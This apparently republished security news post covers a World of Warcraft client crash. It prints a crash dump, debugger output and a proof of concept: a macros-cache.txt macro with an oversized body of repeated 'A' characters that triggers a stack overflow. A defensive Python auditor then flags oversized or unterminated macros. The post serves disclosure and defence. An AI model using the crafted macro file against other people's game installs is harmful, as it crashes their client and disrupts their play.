World of Warcraft vulnerable to DoS via macros-cache.txt [Stack Overflow]

The exploit author AliReza Chegini (@Nimaarek) has published a World of Warcraft DoS attack that uses the macros-cache.txt file.

World of Warcraft is a massively multiplayer online game in which players take a champion and roam the game's world. The game is played by millions of people, and it is still a very attractive target for hackers.

The exploit author has published his findings to the exploit-db community and the 1337day community.

The error output produced after the macros-cache.txt DoS vulnerability is triggered:

Output:
–WoWError [CrashDUmp] :
World of WarCraft (build 12340)
Exe:      D:\Wow\Wow.exe
Time:     Jul 21, 2014  6:10:08.243 PM
User:     nimaarek
Computer: NIMAAREK-L
——————————————————————————
This application has encountered a critical error:
ERROR #132 (0x85100084) Fatal Exception
Program:    D:\Wow\Wow.exe
Exception:  0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77
–Windbg result:
0:020> g
ModLoad: 6c670000 6c6a0000   C:\Windows\SysWOW64\wdmaud.drv
ModLoad: 6d3a0000 6d3a4000   C:\Windows\SysWOW64\ksuser.dll
ModLoad: 6c660000 6c667000   C:\Windows\SysWOW64\AVRT.dll
ModLoad: 6c610000 6c618000   C:\Windows\SysWOW64\msacm32.drv
ModLoad: 6c600000 6c607000   C:\Windows\SysWOW64\midimap.dll
ModLoad: 71e50000 71e66000   C:\Windows\SysWOW64\CRYPTSP.dll
ModLoad: 71e10000 71e4b000   C:\Windows\SysWOW64\rsaenh.dll
(3a8.470): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Wow.exe -
eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000
eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Wow+0xbb77:
0040bb77 8500            test    dword ptr [eax],eax  ds:002b:02af2000=00000000
==============================================================================

The World of Warcraft DoS proof of concept by AliReza Chegini

PoC:
%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt
MACRO 1 "Decursive" INV_Misc_QuestionMark
/stopcasting
/cast [target=mouseover,nomod,exists] Dispel Magic;  [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic
END
MACRO 2 "PoC" INV_Misc_QuestionMark
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 🙂
END
==============================================================================
Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]
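
A defensive check for the file format shown in the PoC, added here as an example and not taken from the exploit author or from the game client: it parses macros-cache.txt content and flags macro bodies that exceed a length limit, as well as blocks with a missing END. The function name `audit_macros`, the sample input and the 255-character threshold (assumed to match the in-game macro editor's limit) are assumptions.

```python
import re

# Assumption: 255 characters is the in-game macro editor's body limit.
MAX_BODY_CHARS = 255
# Header shape taken from the PoC above: MACRO <id> "<name>" <icon>
HEADER = re.compile(r'^MACRO\s+(\d+)\s+"([^"]*)"\s+(\S+)\s*$')

def audit_macros(text, max_body=MAX_BODY_CHARS):
    """Return (macro_id, name, problem) findings for macros-cache.txt content."""
    findings, current, body_len = [], None, 0
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            if current is not None:
                findings.append((*current, "missing END before next MACRO"))
            current, body_len = (int(header.group(1)), header.group(2)), 0
        elif current is None:
            if line.strip():
                findings.append((None, None, "text outside any MACRO block"))
        elif line.strip() == "END":
            if body_len > max_body:
                findings.append(
                    (*current, f"body is {body_len} chars (limit {max_body})"))
            current = None
        else:
            # Newlines between body lines count toward the body length.
            body_len += len(line) + (1 if body_len else 0)
    if current is not None:
        findings.append((*current, "missing END at end of file"))
    return findings

# Constructed sample modelled on the PoC: one normal macro, one oversized body.
SAMPLE = (
    'MACRO 1 "Decursive" INV_Misc_QuestionMark\n'
    '/stopcasting\n'
    '/cast [target=mouseover,nomod,exists] Dispel Magic\n'
    'END\n'
    'MACRO 2 "PoC" INV_Misc_QuestionMark\n'
    + "A" * 4096 + '\nEND\n'
)

if __name__ == "__main__":
    for macro_id, name, problem in audit_macros(SAMPLE):
        print(f"macro {macro_id} ({name!r}): {problem}")
```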